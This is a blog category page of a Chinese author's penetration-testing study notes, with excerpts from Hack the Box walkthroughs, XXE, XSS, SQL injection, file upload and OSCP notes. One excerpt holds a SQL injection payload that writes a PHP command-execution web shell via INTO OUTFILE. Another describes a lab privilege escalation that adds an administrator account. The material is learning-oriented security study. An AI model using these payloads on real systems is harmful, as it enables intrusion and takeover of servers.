渗透测试
文章平均质量分 69
ma963852
这个作者很懒,什么都没留下…
展开
-
渗透测试学习日记之Hack the Box - Appointment
学习笔记原创 2022-12-12 15:11:49 · 321 阅读 · 0 评论 -
渗透测试学习日记之Hack the Box - Redeemer
老规矩第一步启动机器计算机上哪个TCP端口处于开放状态?6379提示为4位,最后一位是9。本来想四位数端口全扫(nmap -sV -sC -v -p 1000-9999 10.129.136.187)。网络问题太慢了。最后只能指定端口扫描。 计算机上打开的端口上正在运行那个服务?redis Redis是什么类型的数据库?从以下选项中选择:(i)In-memory Database(ii)Traditional DatabaseIn-memory Database 那个命令行实用程序用于Redis服务器交互?原创 2022-06-17 11:06:37 · 696 阅读 · 0 评论 -
渗透测试学习日记之Hack the Box - Dancing
首先创建机器三个字母的缩写词SMB代表什么?server message blockSMB使用哪个端口进行操作?445 从架构上讲,SMB是用什么样的网络通信模型?client-server model nmap扫描中出现的端口445的服务名称是什么microsoft-ds 我们使用什么工具从linux发行版连接到SMB共享?smbclient 我们可以使用SMB工具“列出”共享内容的"flag"或"switch"是什么? -L 我们最终能够访问的共享的名称是什么?WorkShares 我们可以在SMB原创 2022-06-13 16:36:53 · 227 阅读 · 0 评论 -
渗透测试学习日记之Hack the Box - Fawn
首先创建机器三个字母的首字母缩写FTP代表什么?file transfer protocol从架构上讲,FTP使用什么通信模型? client-server model一个流行的GUI FTP程序的名称是什么?filezillaFTP服务通常在哪个端口上活动?21 tcp FTP安全版本的首字母缩略词是什么?sftp 我们可以使用什么命令来测试与目标的连接?ping 通过扫描,目标上运行的FTP版本是什么? vsftpd 3.0.3 通过扫描,目标上运行的是什么操作系统类型?unix 通过匿名(anonym原创 2022-06-06 09:44:06 · 253 阅读 · 0 评论 -
渗透测试学习日记之Hack the Box - Meow
hackthebox学习记录原创 2022-06-01 17:38:54 · 727 阅读 · 1 评论 -
XXE漏洞总结
搬运:未知攻焉知防——XXE漏洞攻防 - 博客 - 腾讯安全应急响应中心一、XML基础知识XML用于标记电子文件使其具有结构性的标记语言,可以用来标记数据、定义数据类型,是一种允许用户对自己的标记语言进行定义的元语言。XML文档结构包括XML声明、DTD文档类型定义(可选)、文档元素。DTD(文档类型定义)的作用是定义XML文档的合法构建模块。DTD可以再XML文档内部声明,也可以外部引用。内部声明DTD<根元素[声明元素]>引用外部DTD<根元素 SY原创 2022-05-27 17:17:50 · 943 阅读 · 0 评论 -
Burp Macros功能实现token验证爆破
服务端有token验证,token不正确则会提示:“csrf token error”所以没办法重放,或者爆破。服务端返回内容中有携带token值,下次请求携带token值就可以正常访问。接下来使用burp macros功能动态获取token,然后绕过csrf的限制创建宏规则点击macros下的add找到token页面的请求记录,点击ok可以自定义描述,然后选择Configure item点击add点击refetch response再...原创 2022-04-15 18:01:15 · 1149 阅读 · 0 评论 -
xss漏洞知识总结
漏洞原理跨站脚本攻击(Cross Site Scripting),为了不和层叠样式表(Cascading Style Sheets, CSS)的缩写混淆,故将跨站脚本攻击缩写为XSS。未对用户的输入进行处理,浏览器将用户输入的内容当作脚本执行。恶意攻击者往Web页面里插入恶意JS代码,当用户浏览该页之时,嵌入其中Web里面的JS代码会被执行,从而达到恶意的特殊目的。是一种针对用户浏览器的攻击。漏洞分类Xss主要分为三种类型:(1)反射型反射型xss又称非持久性xss,需要用户点击带有原创 2022-04-14 16:34:14 · 5616 阅读 · 0 评论 -
SQL注入之数据库判断
01 网站类型与数据库的联系asp:SQLServer,Access.net :SQLServerphp:Mysql,PostgreSqljava:Oracle,Mysql可以根据网站类型来大概确定后续测试数据库的优先级。02 依据主机端口如果可以对主机进行端口扫描,可以根据是否开启对应端口,来大概判断数据库类型。Oracle默认端口号:1521SQL Server默认端口号:1433MySQL默认端口号:3306PostgreSql默认端口号:54..原创 2022-04-14 11:40:33 · 4000 阅读 · 0 评论 -
封神台第五章提权
首先拿到webshell,终端拒绝访问。重新上传cmd.exe文件至服务器。右击-虚拟终端新建一个用户试试还是拒绝访问因为使用cmd需要用到外部接口wscript.shell。但是wscript.shell仍然在C盘,C盘我们仍然无法访问。这可怎么办?那么就只能再上传一个已经组装好的wscript.shell上传完成切换到此路径通过iis6.exe执行命令接着创建新用户命令执行成功,查看新建用户用户为users组成员,将其添加至管理员...原创 2022-03-31 14:58:58 · 4427 阅读 · 0 评论 -
文件上传漏洞
文件上传漏洞是指用户上传了一个可执行的脚本文件,并通过此脚本文件获得了执行服务器端命令的能力。文件上传漏洞一般都是指“上传Web脚本能够被服务器解析”的问题。原创 2022-02-28 15:29:48 · 18314 阅读 · 3 评论 -
学习日记7
SQL injectionid=1 union all select 1,2,load_file('c:/windows/system32/drivers/etc/hosts')into OUTFILEc:/xampp/htdocsid=1 union all select 1,2,"<php? echo'<pre>'.shell_exec($_GET['cmd']).'</pre>';?>" into OUTFILE '...原创 2021-11-09 16:03:32 · 470 阅读 · 0 评论 -
学习日记6
Vulnerability Scanning overview and considerationHow Vuln Scanners work Workflow of Vuln scanning1.Detect2.Port scan 3.Identify the OS 4.Identify running services 5.Signature-matching to dicscover v...原创 2021-11-09 08:31:11 · 59 阅读 · 0 评论 -
学习日记5
DNSEnumerationinteracting with a DNS serverhost -t mx megacorpone.com Automating lookupsForward lookup brute forcelist.txt: ftp mail owa proxy router批处理:for ip in $(cat [list.txt]...原创 2021-11-08 11:21:17 · 667 阅读 · 0 评论 -
学习日记3
Bash ScriptingIntro to Bash scripting.sh写.sh文件(hello-world.sh) #!/bin/bash # Hello World Bash Script echo "Hello World"执行 chmod +x hello-world.sh ./hello-world.shVariablessubshell...原创 2021-11-01 17:17:23 · 67 阅读 · 0 评论 -
学习日记2
practical toolsNetcatConnection to a TCP/UDP nc -n -v [target] [port]Listening to a TCP/UDP nc -nvlp [prot]Transferring file whith Netcat nc -l -p [prot] > [filename] nc [targrt] [port] < [filenam...原创 2021-11-01 13:10:14 · 113 阅读 · 0 评论 -
OSCP学习日记
1.Intro of OSCP and Kali2.Getting comfortable with Kali linux2.1Booting up Kali linuxdefaule pw for root:toorpasswdwhoami2.2The Kali menu2.3Kali documentationKali Docs | Kali Linux DocumentationKali Tools | Kali Linux ToolsKali Li原创 2021-10-25 16:27:47 · 2256 阅读 · 0 评论